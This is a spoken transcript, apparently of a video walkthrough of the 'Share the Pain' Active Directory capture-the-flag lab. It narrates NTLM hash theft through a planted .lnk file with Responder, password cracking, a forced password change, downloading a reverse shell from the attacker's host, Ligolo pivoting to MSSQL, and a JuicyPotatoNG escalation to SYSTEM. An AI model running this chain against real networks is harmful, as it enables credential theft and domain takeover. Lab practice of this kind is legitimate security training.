Hello, welcome everyone. Today we're going to be doing the Share the Pain Active Directory box on hacksmarter.org. This is a medium difficulty box, and we're going to be walking through it and trying to understand how to attack the Active Directory and kind of figure out like what's going on with this box. So let's get started. All applications I use or programs I use will be in the description of the video, so you can click the link and access that. So let's get to it. Okay, so first thing we're going to do is we're going to run a Rust scan on the target. So I like to export the IP first, and that way when I run the Rust scan, it will just use the exported value here. Okay, so what am I doing here? I'm running a program called rustscan, which is similar to Nmap. It actually uses both. So it checks, rustscan is really good for like scanning the ports quickly, and then it will actually run Nmap afterwards to do the more advanced enumeration. So in this case, rustscan scanned all 65,000 ports quite fast. Um, so rustscan does not come prepackaged on Kali, so you do need to download that. So let me add that here, rust scan GitHub. So rust scan is right here by bsun, and you can go to the GitHub and clone the repository and get started with that. It's quite nice. I highly recommend it, especially when you're like doing a bunch of boxes at once. Like it's just so much faster when it comes to doing port scanning, at least for capture the flag environments. Okay, so we're waiting for the advanced scans, but we can take a look here. So let's see, we got 88, that's Kerberos, we got LDAP, we got RDP, we got SMB. Okay, so if you see a DNS and you see 88, it means it's probably the DC that we're targeting here. In this one, we do not have any credentials, so we just have to kind of figure out what to attack. One thing I'm noticing is that there's no web server. Okay, so let's take a look here. All right, so what do we see? Well, we see a DNS, which not usually a ton to attack. We got RPC, we got LDAP, we got SMB. Let's see what else we got. More LDAP, RDP. Okay, that's something if I get credentials. Oh, we got WinRM. Okay, might be an access point. Message framing. Okay. So not a ton here. So what would I do in this scenario? So normally when you see this, there's a few things you want to check. You want to check anonymous access to LDAP search. You want to check anonymous access to SMB, and you want to check anonymous access to um, RPC. In this case, you would do LDAP search and see if you can do anonymous binding. Um, with RPC, you would do a query. You could also run enum for Linux, next generation, to see if there's anything. But I'm going to start with SMB. And so we'll do SMB map and just -u, no username, and then the host will be the IP address. And so, oh, you look here. And look here, we have a share folder that has read and write. Now, why is that important? The reason that's important is because in a CTF, if you ever see write access to a share drive, it means that they probably have a bot, and then that bot can be used to steal the NTLM hashes. So normally what I would do in the enumeration phase is I would have ran LDAP search to check it. I would have ran RDC search. I would have ran enum for Linux. There's a bunch of enumeration stuff I would have done. And if you want to see that, you can check the full VOD when I'm discovering the box. It's a much longer video. This one we just want to get to the point though. Okay, so this has write access to a share. So what I want to do is I want to upload a malicious.link file to it, and then the bot is going to click it. And what that will do is it will ask their computer to look for a share file on my computer. And using Samba, it's going to do an NTLM to handshake, and we should be able to capture their hash using responder. So that's the game plan. So the program we'll be using to do this, if we look here, is Greenwolf NTLM theft. So this program will be used to create malicious documents. And the interesting thing about it is these files are not macro-based, and they are built with intended functionality. And none of these were flagged in Windows Defender as of June 2020. Attacks worked on fully patched Windows 10 hosts. Now, will it work on Windows 11? I have not had an issue with it yet, but it's kind of cool. So something to think about. And the other program that we need to use is Responder. Now, Responder should come pre-installed on your Kali Linux machine, but if you don't have it, or maybe you're using Ubuntu or what's it, Parrot? I forget the name, but you can come to Spider Labs and get Responder. And what this will do is it will capture the NTLM2 hash that's given to us by the malicious share link. So I've already installed this, but again, you can go to the GitHub. It's link in the description, and you can download it and get started. So what do? We are going to go to where I have the directory. So I have it in Proving Ground Vault. Okay, and then NTLM theft. Okay, and here we go, NTLM. So how do we run this program? Well, let's check the GitHub. GitHub usually shows example usages. So if we look here, we have Python 3, NTLM, theft, py, g, all, but all is every file extension. I don't want every file extension. I just want .lnk, so .link, -s, and then this is, we don't want your local IP. We're going to want to do the VPN IP that you use to connect, and then -f, and then this is the name of the document. So we can just copy this, copy it, and bring it on over to our Kali, and we'll rename this to hacked, just hacked, and then our IP, which I have tuned 0 up here. So 10, 200, 42, 143. And then for the file type, I want LNK. So we do that. And it looks like it ran it. So we see a file here called hacked, and then there we go, hacked LNK. So print working directory. So I'm going to copy this because I want to move this file back over to our ShareThePain. So copy, and this will be hacked.lnk, and move it here. And there we go, hacked.lnk. Okay, now what do we need to do? We need to open up Responder so that we can actually capture it. So very simple. You just do responder-I. Tune 0 is the VPN IP that I currently have, and then -WB is just the syntax for the capturing. Oh, always run your responder as root. Okay. If it says that your error is on 389 is not running, that's fine, because we're not capturing it over LDAP. So, LDAP. So we're mostly capturing it. We're capturing it over SMB. So if it looks like this, should be good to go. Okay. So always name your things to keep them accurate. And by the way, this whole time you should be screenshotting and documenting. I've already completed this box, so I know what we're doing. But in a normal environment, I would be screenshotting everything and keeping very detailed notes of Obsidian. And if you want to see more of that, you can watch me live, or you can watch the VODs, which is the long form content where I'm discovering boxes and like stumbling through it with you. So let's continue. So next we want S&D client. So the domain of this one is hack.smarter. You would have discovered that with enum for Linux. We want to target our IP and then target the share. Now we go here. And let's see if it lets us. Connection failed. Why did the connection fail? Oh, that's right. Okay, so connection failed because every new tab, you have to re-export the IP. I have yet to figure out how to do that globally. If one of you guys know how to do that globally, leave a comment. Okay, so let's take a look here. So it's an empty file, but we have write access to this. So we're going to put hacked.lnk and then dir, and now it is there. And now we go over to our responder and look at that. Bob Ross, click, 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 click. Now, to make sure that you don't get flooded with a bunch of things, I recommend that you just remove it right away. Okay, so what happened there? So we uploaded a malicious.link file, then the person, the simulated human on the other end, clicked the link. Their machine was told, hey, go to the Kali Linux machine and try to grab a share file. And when it does that, the Windows machine tries to authenticate itself because it has signing turned on. So when it tries to authenticate, it's going to give me its NTLM2 hash to show that, hey, I am a real person. My name is Bob Ross. Here is my hash. Because Windows doesn't assume that I know how to crack that. And so this is NTLM theft. This is not the same as a relay, but it is very similar. So now that I have Bob Ross's hash, we can attempt to crack this. So we go to hashcat here, and we're going to have our username, bob.hash, which we've already established, and then we're going to link to the share folder, or not the share folder, the password directory. So in this case, I'm using rocku.txt and linked databases from Seclist, very useful. And you can mutate it and add rules, but I recommend just running the base Rocku first, just because it's faster. And in most CTFs, they don't expect you to like mutate the rule list with Rocku because it just takes too long. They're usually pretty simple passwords if you're on the right path. So we have it here. And so we're going to make a user list and a password list. So if we cat users.txt, we got Bob Ross. And our passwords, we have 137 password 123. Okay, next, what do? We are going to start with a cred spray. Now, this particular program I have here, it's from Strikeodeer, very useful. It's essentially just netexec, but it can do spraying for all functionalities. So like LDAP, it can spray for RDP, it can spray for MSSQL. There's a whole bunch of things that it can do. So it's very useful. I highly recommend you download it. Link in the description. So let's try running a scan on this. So we start with SMB, WinRM, RDP, and you know what? Let's do LDAP and WIM. So we're going to run this and see what happens. Okay, so you see how it says null auth true? That's why we were able to log in anonymously or with a null account. And then SMB signing is why we were able to get the NTLM2 hash, I believe. So what do we got here? So it shows that these are valid credentials for SMB, but it doesn't say pwned. And what does that mean? So when it says pwned, it means that we actually have like advanced access. So for example, if it said pwned for SMB, that means we could use like PSXEC. If it said pwn for WinRM, we could use eval WinRM. If it said pwn for RDP, it means we could log in as RDP, right? So all we have is valid credentials for RPC and SMB. So these are valid, but they do not give us initial access. So what do we do? Well, the first thing that we should do is we would recheck LDAP search using these valid credentials. We would recheck enum for Linux using these valid credentials. We would recheck RPC search using these valid credentials. And the main thing that we can do is, since these are Active Directory credentials, is we can do BloodHound. Now, in this particular box, I can tell you that those 3 previous ones don't really reveal anything. The one that we want to do is BloodHound. And so how do we do BloodHound? Well, normally in a Windows machine, you would go and use ShareHound, PS1. That's probably what you were taught. And in order to do that, we need RDP. But we don't have RDP. So how do we get this information? Well, turns out you can do it from Kali. So there's a program called BloodHound-Python. And BloodHound-Python, the domain is going to be Hacksmarter. The user is going to be Bob Ross, or input the password. The IP is going to be the IP I exported, and we're going to collect all. This is the exact same thing as SharePound, but can be done from your Kali machine. And I have found that when you are trying to collect BloodHound, this is very useful to do it this way. Instead of trying to do it directly from the computer. Because when you log into their computer, you have to like do it, and then you have to extract the credentials. It's actually really annoying. This is just way easier to do. So BloodHound-Python should be built into Kali Linux if you have Kali Linux. So let's run it. Okay, connecting to LDAP. By the way, I already put DC01 Hacksmarter into my Etsy host file. If you did not do that, you need to do that. And make sure it's bound to the correct IP address. So what that would look like while we're waiting for that to run, then Etsy hosts, then Etsy hosts. Okay, so what does that look like? Take your IP address, put the entire Active Directory, so dco1.hack.smarter, space, dco1, space, hack.smarter. This is very useful when you're doing pen testing. A lot of times, the CTS will have domain names that are not linked to IPs, and then it won't load. So always, always, always make sure that you link your IPs to any domain names that you might find. It's required. Okay, let's continue. So that is now done, and we now have a bunch of stuff here. Okay, so I have doubles of this because I've already done this thing. So the next thing we're going to do is BloodHound. So we're going to start BloodHound. And what is BloodHound? BloodHound is a graphical tool used for enumerating Active Directory. So I have it here. System, penalty, strike. Oh, you go, BloodHound. So you can go to Spectre Ops to download BloodHound. Installing is kind of annoying. So I recommend you ask AI to help a little bit, because this is not a BloodHound tutorial. But there are tutorials you can find. But this is the tool that we'll be using. Link in the description. So let's go back to our BloodHound. So normally what you would do is, I like to go to Profile, and then I like to go to Database Management, and then I would delete everything, and then File Ingest, Upload, and then you upload the 6 files you just downloaded. Now, I've already done that, so I don't need to do it again. So let's look at Bob Ross. So here is Bob. Now, the first thing you do when you have a user is you right-click, and you're gonna add to own. And this shows that I own him. Okay. Now, we're going to scroll down and see, does he have any outbound object controls? And look at that. Yes, he does. He has control over Alice. Okay, and what does he have? He has owns, right owner, and generic all. These are very powerful to have. Okay, so does Alice have anything? So if we click Alice, what does Alice have? So Alice has no outbound controls, but she's a member of 3 groups. If we look at Bob, Bob's only a member of 2 groups. Okay, so Bob is a member of domain users and users, right? So let's look at the outbound. Look at Alice. So Alice is a member of, oh, look at that, remote management users. Do you remember that RDT that the WinRM that we saw? Remote management users can use WinRM to directly access the system. So this is our way in. So how do we get control of Alice? Well, we're going to do that through Bob. So we click on Bob, and we go to outbound control, and you can click generic all, and then here, BloodHound will show you how you would abuse it in Windows and how you can abuse it in Linux. Now, there's a few different ways you could do it. The one that I like doing is the forced password change. So we can use Samba's net tool to change the user's password. The user's credentials can be supplied in clear text or prompted. And it's net RTC password. This is the target user, the new password. This would be the domain, and the user I control, so Bob Ross, and then Bob Ross's password, and then the -s is the domain controller. So that sounds like a lot, but let's look at what that means, like one step at a time. So if we do net RTC, or net RTC, here we go. So we have the IP address of the domain controller, we have Bob's password, Bob's name, the domain Bob is a part of, the new password for Alice, and Alice's name. That's it. It's just this command right here. So we hit enter, and if there are no errors, it means that it has worked. So let's run it. And we have no errors. So if we go to then users, and we're going to add in the user, Alice Wonderland, and then we'll go to passwords, and we're going to add the password, password 123. Now we'll go back to our cred spray, and we're going to try this again. So we will do 1, 2, and 3. So we're checking SMB, we're checking WinRM, and RDT. And let's see if she has access to any of these. Oh, my IP is wrong. Always remember that you need to re-export your IP for every tab that you open. Okay, 1 to 3. Okay, so let's see what we got going on. So now, again, normally in BloodHound, you would also check like, you would check for Kerberos users, you would check for AP rep roasting. You would do a lot more enumeration than what I'm doing. This is just, I know what we need to do, so this is how we move on to the next step. So as we can see in the domain, Alice has successfully switched Alice's password. Ooh, ding, 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 ding. Look here. WinRM, Alice has a pwn. This means that we can use WinRM as our access point to enter the system. So you would normally take a screenshot, boop, screenshot, and you would save it to your notes. So we can use Alice to get into the system. So we will do that by evil WinRM. So evil WinRM -I, our IP address, the username, and the password. That's it. Nice and simple. So let's click it and see if we can get in. And there we go. We are in. So who am I? I am Hack Alice in Wonderland. Now, here's the thing. I do not like using evil WinRM because it's kind of laggy and it's slow, and there's some programs that it doesn't like to run. But it's a great initial access point so that you can switch to a better shell. So first thing we do is we do tree/f, and what does that do? It shows us all the files that she has access to. In this case, the desktop under Alice is the user.txt flag. That would be the flag that you would click, so you can enter it into the system. Next, let's look around a little bit. Oh, that's interesting. All right, so what do we see? We see a SQL 2019 folder. Now that's interesting because when we did enumeration, we did not see an MSSQL. This is Windows, so with the MSSQL. So let's check ano. Let's see, netstat-no. And let's see if we can see an MSSQL running. Probably should not have clicked the UDP, but we're already here. So let's take a look. So we're going to go up to TCP. There we go, TCP. Okay, so we're looking for 14. Let's see. Oh, look here. Local machine 127 on 1433. It is listening. So that means the firewall was blocking this MSSQL server, and we were not able to access it. So what do? Well, we need to bypass the firewall. So there's a few ways you could do it. You could use Chisel, but I'm going to be using Legolo because Legolo is just way more user-friendly. So let's learn how to do that. So first thing we're going to do is we're going to move to this temp folder that they created for us. Okay, so I want to transfer over a shell so that I don't have to be using EvilWinRM for pivoting or for bypassing the firewall. So let's go to my toolkit, offset, desktop, offset, Active Directory and tools. Okay, so we're going to create a shell using MSF Venom, and port 444 is fine. And make sure that our IP is correct. It is correct. Okay, and then we are going to host our web server on port 80. Now, the reason we're doing port 80 is because sometimes firewalls block it. And by the way, if you transfer your shell over and you're not getting a connection, try changing the port. It's possible that the port you're trying to connect to is blocked. Depends on the environment you're in. But port 80, port 443, usually these are not blocked. Yeah, so just you can do that. So we have that HTTP server running, so now we can host our files to the target machine. So let's go back to EvilWinRM. Where are you? You're right here. Okay. So how do we get it over? So we're going to do wget because PowerShell has a lot of Linux aliases, and wget is one of them. So wget http // and we're going to do our IP 143.80, and then I want to bring over shell.exe, and then the -out file and shell.exe. Okay, there's another thing I want to bring over. Normally, I would also bring over WinPeas, and you'd run WinPeas and create a report. I already ran WinPeas on this. We don't need to run WinPeas on this particular machine. We're going to be doing what we're going to be doing. So bring over the shell. The other thing I need to bring over is the agent from Legolo. And we'll explain how to use Legolo here in a second. So we bring over agent.exe. Okay. And yep, we can see that we have the agent.exe currently there. Now, what do I need to do? So I want to use Penelope. So what is Penelope? Penelope is an amazing shell handler. If you ever used MSF Venom, or sorry, not MSF Venom, MSF Console, you know that it can have like a bunch of different shells from different machines. It labels them. It's really nice. This is like that, but it's not using MSF. And the reason I prefer it is it's much faster. It has a lot of built-in functionality. You don't have to load the entire framework. You don't have to have PostgreSQL running. It's just really quick. So it's made by Bright.io, and it's fantastic, and it is OSCP safe as long as you don't use any of the post exploitation modules built in. So that is fantastic. Highly recommend it. So let get it set up. By default, it is set up to port 4444, which is what we're doing. And so let's run shell.exe. And we actually want to run it twice. I like to have many shells at the same time. So we go to Penelope, and we can see here that we have 2 shells, sessions. We'll do session 2 to start. And where it starts in CMD, and then we can switch over to PowerShell if we need to. So now what do? We want to bypass that MSSQL firewall, the firewall for that port. We want to bypass it. So how do we do that? So we're going to use a program called Ligolo. So if we look here, responder, Ligolo. So Ligolo is made by Nico Cha 30, and there is a lot of details online on how to use Ligolo, how to install it. Definitely worth learning if you want to learn about pivoting or port forwarding. It's just a fantastic resource. They do not teach Ligolo in the OSCP or EJPT or ECPPT. I had to learn this myself. They do teach this in Hackbox, and everyone recommends. It's just the go-to. It's the go-to pivoting software. So right here is the GitHub, and you can download it and try to follow along. There are many guides. I recommend looking them up by yourself. Definitely worth learning. So what do? Well, we need to go to our Ligolo tab and set up Ligolo. So I have here, so first thing we're going to do is we're going to add in a tune IP to the user called Ligolo. And we're going to sudo IP link setup. So if we do ifconfig, we can now see that I have a Ligolo set up. Next, we're going to go here, and we already transferred the file over, so we're going to do proxy self-search. And no, I don't need to enable the web. Okay. Next, we're going to connect to our Ligolo server using Penelope, using agent.exe connect as the RIP address. Then it's going to be the port for Ligolo. It's going to retry if it fails, and it's going to ignore the certificate. And if we go back to Ligolo, we can see that an agent joined. We type in the word sessions, or session, click 1, and start. So now it's starting the tunneling. So now Ligolo is connected to this one. Now you understand why I wanted 2 shells. Session 1. So now it can run the Ligolo in the background while I'm still operating on the machine, the target machine. If you're using Netcat for this, you would have to have a bunch of different tabs open. It would be really annoying and inconvenient. This is why a shell handler is so nice, especially if you're studying for the OSCP and you're not allowed to use MSF console. So definitely get Penelope. It's a game changer. Okay, so now that we're connected, what do? So we need to add in the built-in route for Ligolo. So what do I mean by that? So Ligolo has a built-in IP route that it's able to use for port forwarding on any agent that it's connected to. So for example, MSSQL was on 127, the local port, and it's on port 1433. So I cannot access that. But with Logolo running, it can port forward all of that stuff to 240 0001 on /32. So by connecting to that and adding that to my IP route, we will be able to access all the files hidden behind the firewall. So maybe I should just show you instead of explaining it. So cd Hacksmarter, ShareThePain. Okay, so what we're going to do is we're going to add this sudo IP route add 240.001/32 dev Logolo. Now, what this does is when I target this IP address, 240.001, it's going to take that, send it to Logolo, and then send it to the target machine Logolo is running on. And vice versa, anything running on the target machine is now being routed to 240. So instead of having to port forward every individual port, this port forwards everything to me. So, and we can tell that by running a Rust scan again. So now, when I run the Rust scan, I'm not targeting the 10.200 IP. I'm targeting 240.001. And in theory, if this is working properly, we should see port 1433. So let's take a look. So you see how we see 53, 88, 245. Well, what am I targeting? I'm targeting the machine ShareThePain. So right now, Rust scan is being a little slow. Maybe I won't use Rust. Let's try nmap. Sudo nmap 240.0.0.1 pn-ss, and yeah, let's just try that. So one thing with Logolo, connection refuse, you're still going through a pivot point. So understand that if you are going too fast, it might not be able to share every single packet right away, right? So sometimes slowing the timing of your scan can help. Here we go. Oh, and look at that. What do we see here? 1433. Yes. So now we can access the MSSQL server. So what do we do? Well, we could try just logging in, but we have our cred spray, right? So now that we have our cred spray, let's try cred spraying MSSQL and see what happens. Oh, don't forget to export your IP. And 5. And let's see if any of these users have access to MSSQL. Oh, hold on. I might have an outdated thing. Okay. Let's just try running the command netexec. Okay, let's try running this. Let's see. The schema mismatch, detailed log relation protocol in SQL. That's probably because a newer version is being run on an old. You can save the old and remove the instance. Oh, okay. So let's clear the. Let's clear this. Okay, there we go. Huh. All right, what's going on? Not running. Interesting. Okay, well, not a problem. So we are going to run inpacket ms. Let me see what the command is here. Nothing ever works perfectly. Inpacket MSSQL. Okay, let's try this. Python 3 MSSQL client.py. And then it's going to be, let's try our user, oh, what's her name? Alice. Alice.wonderland. And her password was password123 at, and it's going to be IP. And let's see if we can connect. All right, connection refused. Okay, let's try the actual IP and see if that makes a difference. So it's 10.1.85.103. 10.1.85.103. Okay, let's try putting it in quotes. Okay, let's try local off. Oh, I understand now. Okay. I'm silly. We're not targeting the local IP. We're targeting the Logolo server. Neat. That's why you gotta think. There we go, and now we can see it. So what was going on? We were trying to target the IP address of the ShareThePain box, but that's not what we should be targeting. We should target the Logolo server. And what do we see? We see that Alice here is an admin on the local server. So what does that mean? It means that we can use XP command to escape from MSSQL and get a shell. But you might think, well, what does that matter? We already have a shell, right? Like, why do I need to get in through a different way? Well, I'll explain as we go in. So let's do MSSQL. Okay, and our IP is 240.0.0.1. Local auth? Was it local? Local auth? No. Okay, hold on. Why did it fail to log in? Alice Wonderland. Yeah. Password 123. Yeah. Okay, so we need to get into this MSSQL database. So how do we do that? Well, we can do it with MSSQL client, but that doesn't seem to be working for some reason. So let's try netexec, see if that can do it. So it's going to be 240.0.0.1 -user Alice Wonderland lowercase p. Password 123. And let's try a command. Who am I /priv. Let's see if that works. Ah, there we go. Okay. So I was not able to connect via MSSQL client, but I am able to send commands via netexec. Okay, so this is why it's useful to know multiple tools. Now, why does this matter? Well, this matters because when you log into MSSQL as an admin, you are not actually acting under the authority of your user account. You are acting under the authority of the service account for MSSQL. And service accounts, such as a web service account or an MSSQL service account, often have different privileges than a standard user account. And one of the main privileges that they have is the SE impersonation privilege. Now, if you have this, you can do what's called a potato attack or a juicy potato attack to escalate your privilege to a much higher level. Now, this is why it's important that we have access to actually two different versions. So what I'm going to do is I'm going to transfer over the juicy potato exploit to this target. So let me get the name. So the juicy potato that I use is juicy potato new generation. And let me pull it up here. So it's GitHub, Anito Cuckoo. Now, the reason why I use the new generation is because it works for Windows Server 2022. And so very useful. Everyone's like, oh, God Potato is really good. It's like, yeah, it's good, but like this one is the newer one and it works well for most of the current systems. So it's the one I use. Okay, so what do we do? First, we're going to go to PowerShell because I don't like using cert-util. And we're going to wget http // we are 10.200.42.143 on port 80. We are using juicy potato -out file. Juicy potato. Okay, and so now it's there. And here's the big one. We have shell.exe. We're going to keep that there too. So what's happening? Well, what's happening is we are going to use this MSSQL command. Okay, so I'm going to tell the computer using Alice's credentials with MSSQL to activate the juicy potato program that I have in the temp folder. What that will do is that will then execute a new command using the SD impersonate privilege. It's going to elevate it to NT authority and then run a command again using that new NT authority that I want. And so what I'm going to have it do is run shell.exe. So here's what's going to happen. I'm going to give the netexec MSSQL command. It's going to tell it to run juicy potato, and then that juicy potato is going to run a command, which is shell.exe, which will give me a new shell on penalty, which should allow me to have NT authority system. So that's the game plan. Let's see if it works. So how do we do that? So first, we got to get to our command here. And I have to pull up my command list for juicy potato. So give me a second. Juicy potato. Okay, here we go. So this is the command that I want to run. So juicy potato dot new generation exe. It's going to timing is asterisks. It's going to go to C&D, and then in C&D it's going to run c temp shell.exe, which if we look here, c10. Now, why do I have 2 dashes? I have 2 dashes because absolute pathing just prevents errors. So if this works, this should get us a shell on penalty with NT authority. Let's find out. Oh, doesn't like something. What don't you like? Is there an extra quote? Quote, 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 quote. Oh, hold on. We got an extra quote somewhere. Maybe I need to do single quotes here. Okay, I think I figured it out. I had to do a little research, but because this is XP command, the syntax is a little different than a normal shell. So this should hopefully work. Let's find out. Okay, so let's take a look here. Definitely got something. For the qualify command. All right, so if this worked, we should have gotten a shell. So let's see. And we did not. Okay. Well, failure is just a chance to grow. So what should we do? Well, if I'm having issues doing this, then I think I'm not going to run the entire exploit from here. I think instead, I'm going to just run the just the shell.exe, right? So let me look up my XP command cheat sheet. So if that's the case, then the command I want to run is, let's do c // temp shell.exe. Let's see if that works. Oh, did not like that. Okay, hold on. Backslash, backslash. Did not like that either. Oh, but we're getting a shell. Okay, so it doesn't really matter if it likes it. Alright. Okay, so look here. So now we have a shell as NT service MSSQL. Okay, so my idea was not wrong. We just have to do an extra step. So, who am I? I am NT service. Okay, so now what do we do? So now we are going to run the juicy potato exploit. Except, so what I was trying to do before was run it all at once, and that was a mistake because it doesn't like that. So instead, what we did was we had the MSSQL run my shell.exe as the MSSQL service, which then allowed me to gain access as this new user. And now, as this new user, I will run the juicy potato in combination with this SE impersonate privilege to get root access. So that's what we're going to do. So we run this command, juicypotato.exe, and new generation, and then we're going to target it. And when we run this, bam, we got a shell. And who did we get a shell as? Look here, NT authority system. So sessions 5. Who am I? NT authority. So we go back to our users, and then we tree/full. And look here, Bob Ross. We can see what's in your beautiful stuff. We can see here. Oh, and here's the main thing, root.txt. All right, and that's it for the video, guys. Thank you so much for being with me. Make sure to drop a like and subscribe if you want to see more tutorial videos. I do live streams, and if you want to see more long-form content where I like struggle through this stuff and you watch me like figure it out, I upload the VODs every time. So thank you for joining. Have a nice day and take care.